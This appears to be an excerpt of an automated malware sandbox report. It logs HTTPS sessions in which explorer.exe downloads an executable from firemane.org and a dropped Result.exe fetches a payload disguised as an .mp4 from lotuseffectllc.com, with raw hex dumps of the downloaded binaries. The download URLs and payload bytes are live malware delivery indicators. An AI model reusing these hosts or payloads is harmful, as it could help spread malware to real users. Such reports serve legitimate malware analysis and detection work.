                                                                                                                                                                                2024-12-30 18:45:41 UTC8000INData Raw: bf 1b 7d 52 9a dd 1e d8 68 bb 4c 21 a2 cc 91 bf ea 19 00 47 08 4b f1 bb 40 ae 4d b6 3d 3d ae 22 fa c9 d2 41 ab 98 8f 05 5d 10 5e 28 53 61 23 a2 9c 93 72 f4 eb 42 12 d7 ac 51 5d 3c c7 47 51 e5 de 63 69 09 48 c5 54 88 91 88 a3 5f dd ac 20 f9 0e 35 c2 0f 08 33 70 68 1f 59 19 f5 9d 14 e4 89 d4 19 18 7c da f2 f3 dd b6 f1 f8 85 05 4c 63 6e 6e 12 3d 41 fe c7 7c ed 0e 36 e6 58 c5 5c 52 a5 fe df 75 04 10 87 ca 40 98 16 43 aa 29 b2 ad d3 52 ab ca b4 df 10 a9 8d 6e 48 77 23 49 ad 43 c8 d3 e8 aa 05 b3 db c2 84 85 09 2b 58 25 e4 12 01 eb bd 30 99 39 b1 31 95 06 11 2d 50 5d 6e 3d 31 d3 69 2b 9e 9a 22 5e 82 7a 79 25 cb 75 11 ec df a7 ca 33 26 e4 d8 b8 e9 25 f9 20 fc 6b 54 f2 6d cd e4 1d 18 62 71 23 15 dd 65 9c ef d9 f8 86 2a 68 6d 39 19 cf 29 5b 4f e8 9f a3 af 70 72 26
                                                                                                                                                                                Data Ascii: }RhL!GK@M=="A]^(Sa#rBQ]<GQciHT_ 53phY|Lcnn=A|6X\Ru@C)RnHw#IC+X%091-P]n=1i+"^zy%u3&% kTmbq#e*hm9)[Opr&
                                                                                                                                                                                2024-12-30 18:45:41 UTC8000INData Raw: 9d df 52 3b 2e f1 83 c0 32 1d 4f e8 e7 bd 60 02 87 e6 79 ad c3 61 15 91 38 56 12 7b 9b a1 b2 e7 2f ad e3 3f 98 72 d6 83 9a 8a c9 c3 16 9a b1 32 b3 bc dc d9 60 0b 83 c4 5c 4b fa 3f e6 04 c7 a3 72 6d 79 58 d6 db 8c 30 4a 4b 66 0e 5c 39 cf c4 cd 71 05 38 8a 2c 72 ed b3 10 20 75 17 8d 22 df 88 7a 68 95 ca bd d9 f7 ca ed ac 58 f9 17 36 e2 4a a4 7c 42 69 96 9f 81 6a 6f c0 60 02 72 08 aa aa c8 ad 74 e5 c2 ee 03 a3 bb b1 3d b6 ac f6 e5 b3 fe 54 2a 4a 33 db ba ef c8 2a e7 b0 61 b0 ee 7e 35 9d d5 60 81 e2 be 9b 7d de 77 26 93 8b 49 4e d9 79 e6 da 40 c0 30 94 e4 2b 4a 72 ce dd 01 41 99 53 85 e8 28 5f c2 c6 62 e1 62 df 90 36 71 3b 80 24 44 04 82 c0 b5 6e 51 17 50 92 44 96 99 65 a1 8a 2c a3 ad b3 15 d3 02 7e 34 be 02 73 73 81 0d 21 37 f4 14 3f ee 7f a2 fb 5c 4b 76 f1
                                                                                                                                                                                Data Ascii: R;.2O`ya8V{/?r2`\K?rmyX0JKf\9q8,r u"zhX6J|Bijo`rt=T*J3*a~5`}w&INy@0+JrAS(_bb6q;$DnQPDe,~4ss!7?\Kv
                                                                                                                                                                                2024-12-30 18:45:42 UTC8000INData Raw: 99 75 e1 42 d0 3e 32 0b d9 bf 67 17 61 de c3 bf 3f 64 ef 0c 72 93 55 57 2a 4c 57 08 bf 75 77 89 e4 d9 b3 21 43 cc b3 1c 23 c9 26 78 dc 85 55 76 12 1a fc 73 60 3f 75 e1 d0 e3 20 d7 17 6a b9 24 b6 d2 2b fc 80 84 04 c4 4b 77 38 f4 d4 a7 92 69 18 9b a3 95 a1 20 b4 a1 dc 47 1b de 4d 8f 0d 7e 96 f7 b5 8f 3d f5 51 ab 5c ca e9 9d 7e 2e 62 b0 83 00 3a 50 34 67 8a 51 a5 ef d2 f4 9a b7 e4 80 ff 65 5a 06 a2 29 24 57 6d 90 12 a9 ca 2e c1 e8 0e 9a 31 0b 7e f0 dc fe a4 16 34 bb 1c 7e 24 40 b7 5d 9e c5 4c 21 e2 29 8e ee 37 b4 2c a2 c5 80 b9 d8 5c d4 f3 d0 bc 57 8c 44 04 3d c6 ab aa d4 9f 98 65 06 28 44 a5 35 fb e8 32 07 e3 4d 66 e9 9b 7b 01 d6 a4 44 44 44 96 32 d5 8d c9 91 05 03 00 92 a8 08 c1 0c f5 71 a6 ae 31 7a 73 f1 08 89 51 43 fe db 67 67 ed 2f dd 50 1c f1 2a eb ac
                                                                                                                                                                                Data Ascii: uB>2ga?drUW*LWuw!C#&xUvs`?u j$+Kw8i GM~=Q\~.b:P4gQeZ)$Wm.1~4~$@]L!)7,\WD=e(D52Mf{DDD2q1zsQCgg/P*
                                                                                                                                                                                2024-12-30 18:45:42 UTC8000INData Raw: cf f1 e7 56 83 f9 66 a6 45 fd 17 98 0b cf bc ab 55 3d 62 44 00 0e ec a1 3f 4e d2 43 b5 51 85 7c 09 ce 61 34 bd 9b 52 ac 92 b8 d2 8e 68 04 ec 42 8b 55 04 1f 2f fd aa d3 74 2d 66 da b4 71 f4 64 69 59 79 5f 7f a6 93 36 d6 e5 a4 b6 b6 80 9a 6c fa 8a f9 3e bc 08 ff a9 82 1b 73 bc 94 fb 8f c7 8e 59 23 39 7b 2c c7 54 76 25 bb 58 81 b0 da d1 78 64 3c 23 66 69 1d ba a1 77 e7 6c 0b 6c b4 49 8e 80 35 c3 53 51 c6 b7 91 4f 8c b5 f1 48 e9 05 96 96 8f d9 4b 58 43 e1 84 a6 f1 15 8c 71 16 1b 1a 54 2a 39 31 9a 54 18 28 f9 43 a3 5f 4e 70 c8 2a fe c6 6d 94 7d ea 62 a0 36 15 35 21 ce 0c a2 f5 eb 55 1c 17 f8 74 12 da be 9a 67 b9 8c af 12 03 6b 7b 41 e2 90 1c a5 55 6f 5c 4c 4c b9 2e 1c 9c a9 67 d7 e1 f9 c9 28 26 1d 13 35 d5 48 af c9 36 e6 0d 53 19 6c bc 24 16 f5 30 fe 4a bb 7b
                                                                                                                                                                                Data Ascii: VfEU=bD?NCQ|a4RhBU/t-fqdiYy_6l>sY#9{,Tv%Xxd<#fiwllI5SQOHKXCqT*91T(C_Np*m}b65!Utgk{AUo\LL.g(&5H6Sl$0J{
                                                                                                                                                                                2024-12-30 18:45:42 UTC8000INData Raw: be 20 18 7c 2c 77 08 c5 83 26 35 36 93 d4 1b 6f d8 85 65 7f e9 16 3c 5c f7 d7 ea 6b 9b b1 ce 80 ac 40 2e eb 7a 52 6b fb 7e 16 b6 18 d4 0d 31 8c b5 07 93 e4 bb e5 b6 4f a4 ca a1 46 e1 b7 68 ff 5f 7d 70 af 66 30 7e b3 3b 15 29 da c2 a1 f3 01 38 b7 21 50 23 a1 3f 41 6e 58 a7 ed e8 e5 05 dd 27 3b 8e aa 38 6c 39 e5 e3 c6 3c ef 52 39 6e 5c 5d da 26 d8 12 3d e5 2e c8 a2 46 0e be 63 c4 60 5e b0 ba c7 4e dd 52 8c 97 8d b6 d4 08 9a 90 7d db d3 f6 36 43 8d a2 f7 4b 56 0b 86 39 98 56 f5 8e f0 37 8f 96 b8 0f 4d 63 a9 dc 29 12 9d c2 ca 08 b8 6c 64 2c 5d a3 69 d0 66 27 fd c0 e9 ff 08 21 b3 02 3b 24 3b 2c 35 4f 29 59 69 4c aa 5d 5f ee da 0a 31 c1 25 2a 40 fc c4 cf 80 bf 62 2e be 4d 67 fa c0 2c cf 15 c4 48 55 a0 44 24 59 31 b7 41 db 19 7d 3a 79 51 48 f2 05 37 82 cf eb 34
                                                                                                                                                                                Data Ascii: |,w&56oe<\k@.zRk~1OFh_}pf0~;)8!P#?AnX';8l9<R9n\]&=.Fc`^NR}6CKV9V7Mc)ld,]if'!;$;,5O)YiL]_1%*@b.Mg,HUD$Y1A}:yQH74
                                                                                                                                                                                2024-12-30 18:45:42 UTC8000INData Raw: 3d cf d7 58 b3 db b6 4d db 25 6f 88 2e 71 c1 d0 a5 89 59 dd 09 c9 b1 b5 b5 c8 9c 48 2a 21 4d 1e d2 5a 16 15 5f af 4f d2 84 a9 3c 3e 41 97 c1 01 b4 e0 a0 77 01 dc de 2d 71 e7 68 7c b7 ab 3a d4 b8 3b c5 90 82 8b e0 bd ae 8e 49 25 95 e8 a9 c9 7f 95 3f fb b8 2e 0c 31 67 46 a1 27 84 91 77 69 ca a6 19 54 74 2e b9 e2 6e 35 3b b8 80 ba 36 04 f8 fc f9 ec 5e 9d b0 71 02 03 11 91 63 11 b9 0d 82 10 b9 9c 43 47 d2 3e c7 48 cd 3b 9b 00 0f 68 e9 c2 d8 fc e5 47 4d d5 6d af 90 99 f9 40 2f ae 37 25 eb ca e1 48 3b 8d 8c 03 1c 5b 60 e6 b5 e7 06 97 34 96 a3 fc 66 b9 41 f8 a0 e1 3b fb 37 78 3c 75 1d 01 09 06 aa 64 ec 04 f3 b0 84 12 b8 cb 5b 49 fc d5 b5 1b 57 c9 5f be cc 92 78 e3 f2 2c 8c f6 73 56 2d 71 d2 a6 60 ba f7 fe bf 00 8b 67 98 17 e7 1d 89 f5 e9 ea e0 2e 7a 11 4a 6d 81
                                                                                                                                                                                Data Ascii: =XM%o.qYH*!MZ_O<>Aw-qh|:;I%?.1gF'wiTt.n5;6^qcCG>H;hGMm@/7%H;[`4fA;7x<ud[IW_x,sV-q`g.zJm


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                3192.168.2.45007645.118.248.1844432580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-12-30 18:45:55 UTC159OUTGET /Birge.exe HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: firemane.org
                                                                                                                                                                                2024-12-30 18:45:55 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.26.2
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:55 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 8450386
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Last-Modified: Mon, 30 Dec 2024 14:20:30 GMT
                                                                                                                                                                                ETag: "80f152-62a7d83c9db93"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                2024-12-30 18:45:55 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 58 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 5c 0d 00 00 42 00 00 83 38 00 00 00 10 00
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELX|Nn\B8
                                                                                                                                                                                2024-12-30 18:45:55 UTC16384INData Raw: 11 00 00 8b 55 f0 8d 42 10 66 83 38 00 0f 84 84 00 00 00 8b 4d f4 89 45 c0 8b 02 6a 20 89 4d a8 59 8b d0 23 d1 c7 45 ac 02 00 ff ff c7 45 b0 0d 00 00 00 89 4d bc 89 7d d4 89 55 b8 a8 02 74 26 8d 45 a8 50 6a 00 53 ff 75 fc c7 45 b0 4d 00 00 00 c7 45 d0 01 00 00 00 ff d6 89 45 f4 c7 45 e0 01 00 00 00 eb 28 8b 45 f0 f6 00 04 74 14 ff 75 f4 6a 03 68 0a 11 00 00 ff 75 fc ff d6 89 45 f4 eb 15 8d 45 a8 50 6a 00 53 ff 75 fc ff d6 8b 0d 14 72 43 00 89 04 b9 81 45 f0 20 40 00 00 47 3b 3d ec 2d 47 00 0f 8c 58 ff ff ff 83 7d e0 00 75 1a 6a f0 ff 75 fc ff 15 58 82 40 00 83 e0 fb 50 6a f0 ff 75 fc ff 15 74 82 40 00 83 7d ec 00 75 18 6a 05 ff 75 f8 ff 15 44 82 40 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10
                                                                                                                                                                                Data Ascii: UBf8MEj MY#EEM}Ut&EPjSuEMEEE(EtujhuEEPjSurCE @G;=-GX}ujuX@Pjut@}ujuD@u{u3}u]
                                                                                                                                                                                2024-12-30 18:45:55 UTC16384INData Raw: 00 65 00 78 00 69 00 73 00 74 00 2c 00 20 00 6a 00 75 00 6d 00 70 00 69 00 6e 00 67 00 20 00 25 00 64 00 00 00 00 00 49 00 66 00 46 00 69 00 6c 00 65 00 45 00 78 00 69 00 73 00 74 00 73 00 3a 00 20 00 66 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 2c 00 20 00 6a 00 75 00 6d 00 70 00 69 00 6e 00 67 00 20 00 25 00 64 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 64 00 00 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00
                                                                                                                                                                                Data Ascii: exist, jumping %dIfFileExists: file "%s" exists, jumping %dCreateDirectory: "%s" createdCreateDirectory: can't create "%
                                                                                                                                                                                2024-12-30 18:45:55 UTC16384INData Raw: 67 61 df 0b 31 06 75 dc 27 28 70 c5 18 69 fd 10 a3 10 16 a7 30 16 a7 d0 97 c8 1a e2 90 cc e6 87 35 3f e4 a5 f2 28 d0 19 b9 a3 74 e4 73 e9 35 d2 f9 02 c6 be 83 14 3d c6 71 89 de 7b 89 2f 07 4c 04 98 54 90 5c 48 65 0e 40 ea 7c 3f a4 e9 3b 48 93 88 48 d3 f7 93 4e 22 48 02 a4 13 08 92 00 0e ea e6 65 18 d4 f5 f3 60 61 ff bb 9c e2 0b 80 20 f8 79 12 40 c4 f7 71 23 03 b2 71 3d 90 27 a1 50 24 09 53 8e aa 87 ca 99 52 a8 04 5e fc b5 aa 7f c6 63 75 ef f8 ab 5a ee 67 c6 f5 9d bc ea 4c 6d 1c 92 ec ac 8d ec dd cd b5 c4 d9 76 c4 fc ff 15 85 25 ac 3f bf 12 0f 49 fc e1 29 df 94 3d 8a 67 0b 25 18 32 5e 89 7b 55 e9 31 fe d3 af ea d7 2f df 3d 71 6b 55 64 12 90 05 20 8f 8d 85 63 0b 24 00 c2 1d 02 85 f5 47 29 76 c1 9e 12 93 0f b6 67 1b 7c aa 9a a6 bb 2b 22 41 7b 4f 6f b8 e6 81
                                                                                                                                                                                Data Ascii: ga1u'(pi05?(ts5=q{/LT\He@|?;HHN"He`a y@q#q='P$SR^cuZgLmv%?I)=g%2^{U1/=qkUd c$G)vg|+"A{Oo
                                                                                                                                                                                2024-12-30 18:45:55 UTC16384INData Raw: 42 7f ed 21 c1 8e 04 27 01 c4 22 49 c0 3c bd 76 96 de 33 7d f3 73 8c dd f8 1c 43 1b 9f a3 ef ea e7 e8 be f2 39 3a d7 3f e7 89 00 37 ad f0 80 44 e0 3e 5a 57 1e a0 61 f9 21 49 c0 63 94 2e 3c c5 e5 f9 a7 c8 9f 7b 82 3c 22 73 e6 09 12 a7 1e e1 cc f8 03 78 91 04 d8 0c dd 86 c5 e0 1d 3a de 21 09 b8 83 c0 b1 bb 24 08 04 1d 83 09 5f 7a cc 95 5e 63 4f a2 60 43 d8 0d de e6 ee 7b 8f dc e6 a6 14 7c 46 6e c1 8d 44 c0 9e 44 c0 92 24 c1 b4 6f 13 c6 7c 4c d8 b1 f7 06 0f 92 00 e3 6e 92 82 ee eb 30 22 09 30 24 09 60 67 24 18 74 dc 80 41 fb 2d e8 b7 dd 86 7e f3 2d e8 35 dd 80 5e c3 3a 49 c0 1c 74 ab 86 a1 53 de 05 ed b2 0e 0a ef 1e 68 56 8c 42 a3 7a 0e 1a 2c f8 6b ae 52 f8 5f 87 7a d5 15 68 56 0d d2 6b f3 a1 57 11 09 dd d2 50 68 17 9d 83 56 51 02 34 8a 2e 42 bd b8 0a 6a c5
                                                                                                                                                                                Data Ascii: B!'"I<v3}sC9:?7D>ZWa!Ic.<{<"sx:!$_z^cO`C{|FnDD$o|Ln0"0$`g$tA-~-5^:ItShVBz,kR_zhVkWPhVQ4.Bj
                                                                                                                                                                                2024-12-30 18:45:55 UTC16384INData Raw: 91 34 ff 44 94 30 f9 57 88 e1 7d 9d 05 72 e3 ef 2d 41 43 4f 29 93 ff 23 9a 7f 01 aa 9b f2 51 d9 f4 08 15 ad f5 78 dc 3d c0 64 2f 43 99 d4 e6 bf 48 93 5f 90 52 7f a1 02 00 72 09 00 d9 9d b3 92 04 18 08 00 10 d3 03 0f cd 7f 80 09 61 fe 4f 3f f9 c3 00 a0 e8 0c 28 55 02 a4 b2 fd ef 01 81 97 12 cf bd 72 9d c2 f4 57 24 4f ff df 02 00 ea df 03 00 4b bc 4e 98 ff f4 b3 cf a9 cf 30 f3 fc 33 3e fe 18 4b 1f bd 20 44 88 74 bf 28 f5 f8 17 6d fe 1f d1 f8 bf 06 00 51 01 90 8f 04 10 10 20 1f 12 f8 0a 00 d0 fc 97 5f 4c 11 00 26 b1 f8 42 ac 11 b0 80 85 8f 3f c4 fc 27 9f 62 ee e3 f7 31 fb a1 0c d3 2f 86 08 49 dd 84 25 91 fe c5 1c 00 34 ff 97 00 d0 4a f3 6f a4 6a 09 00 95 04 80 32 39 00 cc e4 a3 67 fa 21 21 20 19 6d 93 31 68 1a 13 cd 00 81 a8 24 00 54 10 00 ca 87 3d 09 01 1e
                                                                                                                                                                                Data Ascii: 4D0W}r-ACO)#Qx=d/CH_RraO?(UrW$OKN03>K Dt(mQ _L&B?'b1/I%4Joj29g!! m1h$T=
                                                                                                                                                                                2024-12-30 18:45:55 UTC16384INData Raw: b9 93 fa c8 9d 32 40 fe 34 35 ab 87 9c 19 6d a4 8d 9c 47 64 d7 49 f8 b7 18 c3 a7 23 02 81 43 bd 88 98 fe 0c b1 f3 bf a5 7e 85 38 d9 2f 90 3c f7 2b 3c 5c fc 05 8a 96 9f e1 f1 52 1d aa 16 82 51 21 73 40 d9 ac 25 8a 69 ee c5 73 ae 28 9d 77 43 c5 9c 1b aa 44 fa 97 5d e7 fe 1a af b9 8a 32 d9 65 5e e3 80 82 59 1b e4 d2 dc 45 fa 7f 40 f3 4f 63 b2 4f 99 52 97 94 46 83 7f 48 b3 cf 25 0c e4 cf 98 50 a6 94 31 1f 13 5a a6 f5 08 0b 5a 34 76 75 1a bc 0a 52 c6 95 90 32 a1 84 e4 89 0b 48 9a 38 47 9d a1 f9 9f e1 f9 73 bc e6 02 df 5b 89 d7 2b 13 74 54 90 3f a6 c6 24 ae 81 a2 66 2d 14 35 e8 a0 a8 95 c9 bf 97 e6 3f 24 cc df 18 25 83 26 28 65 f2 2f a3 f9 97 77 5a e1 71 a7 0d 65 c7 63 7b 94 77 39 50 34 7a a6 fb f2 4e 67 49 8f 3b e4 aa e8 b8 42 b9 e0 71 bb ab a4 f2 0e b9 ca 3a
                                                                                                                                                                                Data Ascii: 2@45mGdI#C~8/<+<\RQ!s@%is(wCD]2e^YE@OcORFH%P1ZZ4vuR2H8Gs[+tT?$f-5?$%&(e/wZqec{w9P4zNgI;Bq:
                                                                                                                                                                                2024-12-30 18:45:55 UTC16384INData Raw: eb 98 ad b0 88 dc 02 b3 30 02 40 f0 a6 df 01 00 6d af 75 d0 bc bf 16 1a 1e 6f 43 dd 63 0d d4 3d 57 43 c3 77 35 83 c0 6a e8 04 af 81 7e d8 db 30 8c 78 07 fa c1 6f 43 d3 93 d7 dd de 07 b5 6b 6a d0 74 32 9a 35 b1 33 0b bc 66 6c bc df c3 f0 d2 ff 54 dc 4e a5 e6 d4 57 81 e0 f5 f6 9f 74 13 33 0a 66 38 dc d9 dc 7c 2d ea 54 fd d5 08 a5 6c 1b 8f 43 d9 57 3d fe af 9a 51 b0 d9 e3 3b 7f 76 e9 92 d9 01 43 bb 4b 29 4a b6 f7 5e ec b5 8c fa 97 f5 26 0f f0 96 c1 43 02 c0 03 02 40 06 de 32 7a 80 35 26 69 54 38 d6 1a ba e1 5d 3d 2b ec d3 d2 c7 45 55 65 18 9f 5f 69 fb 17 86 bf 1f 66 34 79 a1 df 07 00 a2 fc ef a4 7a 0c 01 0e fa 28 0e 77 47 67 86 0f 5a e3 ae 4b 2b fe 3d bc a9 87 10 5b 25 5c d7 39 c6 6b f7 42 ff d8 7b 50 3e ba 11 47 8e ad c2 8e 93 df c3 bb a7 fe 16 ef 9e f9 ef
                                                                                                                                                                                Data Ascii: 0@muoCc=WCw5j~0xoCkjt253flTNWt3f8|-TlCW=Q;vCK)J^&C@2z5&iT8]=+EUe_if4yz(wGgZK+=[%\9kB{P>G
                                                                                                                                                                                2024-12-30 18:45:55 UTC16384INData Raw: 63 f4 09 4b 5f 9c 19 f0 94 20 18 26 26 ee a1 6d f8 0a 1e 0e 54 e2 7e 6f 29 ee f5 94 c8 ef 1b 51 80 d6 ae 7c dc ee c8 63 72 71 ab 3d 1b 37 db b2 a4 b4 b4 11 05 6d e9 4c 1a 61 20 03 41 d3 c3 24 34 3e 48 c4 d5 7b f1 68 b8 2b 20 10 45 04 84 13 01 17 51 2e 10 70 53 8e 80 96 93 c8 b9 7e 0c 19 cd 87 90 da e8 83 c4 ab 5e 88 bb ea 8e a8 2b ce 08 af b3 97 56 01 ce 57 5a 20 50 1c 0b 50 66 88 d3 a5 b2 63 01 0e e7 1d c0 c1 2c 71 a3 ae 1d b0 8c 5a 4b 00 ac 80 f1 45 81 80 77 65 08 60 c4 ae 00 e9 40 c0 f3 6f 42 3b 68 99 6c 37 c0 69 22 40 00 40 e4 ec 22 68 05 2d 92 2e 10 24 ed 0a 88 58 0c 23 02 c0 44 9c 0d 70 7e 09 b4 8e bd 05 bd 23 8a 30 3e 64 f2 47 73 5f e7 66 07 2f 67 dd 2c 25 a5 ff 2e 7f 2b 7e b5 fd 23 37 01 80 7a 02 e0 fe 0f bf 73 e7 c1 0f be db 52 ff da bf 44 d4 ff
                                                                                                                                                                                Data Ascii: cK_ &&mT~o)Q|crq=7mLa A$4>H{h+ EQ.pS~^+VWZ PPfc,qZKEwe`@oB;hl7i"@@"h-.$X#Dp~#0>dGs_f/g,%.+~#7zsRD
                                                                                                                                                                                2024-12-30 18:45:55 UTC16384INData Raw: f3 32 45 e5 39 27 e9 ea 7f 57 43 1c 51 7e d6 0a 89 5e 7a 38 65 b1 07 2e 07 36 c3 4c 65 0d 34 09 00 65 25 65 6c 22 00 56 2b ae c3 7b 0a 6f 62 cd ce a5 04 c0 9b d8 a6 be 1c ca 7a 6b b0 cf 7c 23 34 1d b6 42 df 93 00 38 b4 0b 96 04 80 ed 59 55 d8 07 ed 86 53 f0 1e b8 86 12 14 11 ea f0 8c 3a 00 ef 58 2d f8 24 e8 c0 2f 45 87 08 20 00 d2 44 0c 71 38 d3 13 7e b9 d1 f0 2e a8 81 7b e1 5d d9 31 00 45 9c fc 0b bb e1 4c 04 38 15 cb 20 e0 54 cc 22 66 41 3b 7c 0b 00 f2 5d 02 a2 c8 17 56 03 fe 5f 02 80 d3 3f 18 00 62 05 e0 db 00 60 f9 df 7f 2c 01 c0 8f 00 f0 27 00 0e 13 00 47 09 80 63 04 c0 31 02 e0 38 01 70 b2 f7 f7 38 d3 f7 29 82 07 c6 10 31 98 87 c8 3e 27 84 b4 73 b2 7f f0 1e cb 7f 2d cb 7f 2b ce 3e e2 c4 cf 04 3d da 46 04 b0 f8 1f ec 40 e0 dd 1d 08 ba ad 80 f3 b7 76
                                                                                                                                                                                Data Ascii: 2E9'WCQ~^z8e.6Le4e%el"V+{obzk|#4B8YUS:X-$/E Dq8~.{]1EL8 T"fA;|]V_?b`,'Gc18p8)1>'s-+>=F@v


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                4192.168.2.450077192.185.175.1584435852C:\Users\user\AppData\Roaming\Result.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-12-30 18:45:55 UTC103OUTGET /plugins/panel/uploads/Mwczjtflz.mp4 HTTP/1.1
                                                                                                                                                                                Host: lotuseffectllc.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2024-12-30 18:45:55 UTC235INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:55 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                Last-Modified: Fri, 27 Dec 2024 16:57:13 GMT
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Content-Length: 1229832
                                                                                                                                                                                Content-Type: video/mp4
                                                                                                                                                                                2024-12-30 18:45:55 UTC7957INData Raw: 26 f5 50 a6 f1 5f 38 77 13 ec 6a 95 0b 10 d0 14 09 37 a8 1e 05 95 8e 97 24 66 a2 8d 1a 9e bb a9 fb 8e a5 e1 a7 c3 56 85 5e 70 5c 50 64 ef 83 6e 5a 2f 0b 9f a3 44 5c bc 01 a3 a9 49 40 1d c5 fe 39 86 39 bc 2a f3 24 86 c7 a2 f8 6e 39 56 01 c4 0e 8f 41 0b b7 44 b6 9b cb 4a c4 ea b3 99 97 93 4e 7d d5 cd ab 66 af 2f 66 3d 89 a1 a2 3d a7 08 68 da ff a2 49 37 33 8d d0 bb 13 2e 6e b5 88 19 7f 75 0d 02 80 c8 1b ad 1d a3 e8 17 37 f5 f4 0f c4 d8 28 60 28 a8 3a df 51 91 b1 78 2e 2d bf e4 a0 9a 33 b1 35 7e e3 79 89 77 ee 07 9b 5e 14 33 01 ef 39 1b 4a de 9c ed 85 1f 82 71 0f c2 82 ec 68 fb ac f6 1c 3f d3 6b 1b e4 a7 95 77 a7 36 4a 5d 41 82 09 66 58 e1 29 bd d7 2e 6e b6 a5 a9 ce 9a 49 4c 62 ff d1 ed 1c a4 5d e8 fd 18 cc b6 91 be 05 21 9e 92 85 6b ca 1a ec b1 04 ed e9 3c
                                                                                                                                                                                Data Ascii: &P_8wj7$fV^p\PdnZ/D\I@99*$n9VADJN}f/f==hI73.nu7(`(:Qx.-35~yw^39Jqh?kw6J]AfX).nILb]!k<
                                                                                                                                                                                2024-12-30 18:45:55 UTC8000INData Raw: 0c 33 da 5e 79 09 98 90 52 e5 46 57 2a b2 5e a8 04 a0 7b 40 3a f6 3a d8 72 40 fc 4f 55 92 07 bd 97 7b 1b c5 5a e8 1e 87 22 e1 a8 b8 e1 c6 17 b8 ee 12 2e a4 25 d3 aa db ed ee 5c 71 b9 58 4c 76 ed c6 74 60 97 3a 39 73 ef 8a c6 f8 9d 92 86 04 a4 b6 27 ca a3 e1 dc d5 07 49 d2 81 58 48 a4 1b 73 2a 4e 26 d2 02 20 47 ae 0a 95 69 74 4b 45 ab 22 ec 98 0d f0 e3 32 c6 39 98 c1 66 33 ff 5a e0 28 26 00 7e e2 4e 15 7c a2 5e 1f 2d 65 bc 35 46 7e b1 f1 47 1a b1 32 e1 aa 33 0f a5 94 58 59 c4 da 4c 0c 58 47 6a f3 ff 90 bb 56 58 9e 10 e5 2c 63 6d c1 64 db e4 7b 68 70 f8 7b ae 2a 55 b5 63 f7 4d f5 6f c5 ed db a7 f2 b4 0d 12 c9 7a 09 3b 0d 4d 97 f8 8d 05 e3 bb 63 13 69 0e ec 09 eb c3 26 88 73 63 81 f4 69 5f 7b cd 6e fc 81 47 d0 da b3 d8 73 a8 f5 c5 fd 6f 23 17 db 69 1a be 22
                                                                                                                                                                                Data Ascii: 3^yRFW*^{@::r@OU{Z".%\qXLvt`:9s'IXHs*N& GitKE"29f3Z(&~N|^-e5F~G23XYLXGjVX,cmd{hp{*UcMoz;Mci&sci_{nGso#i"
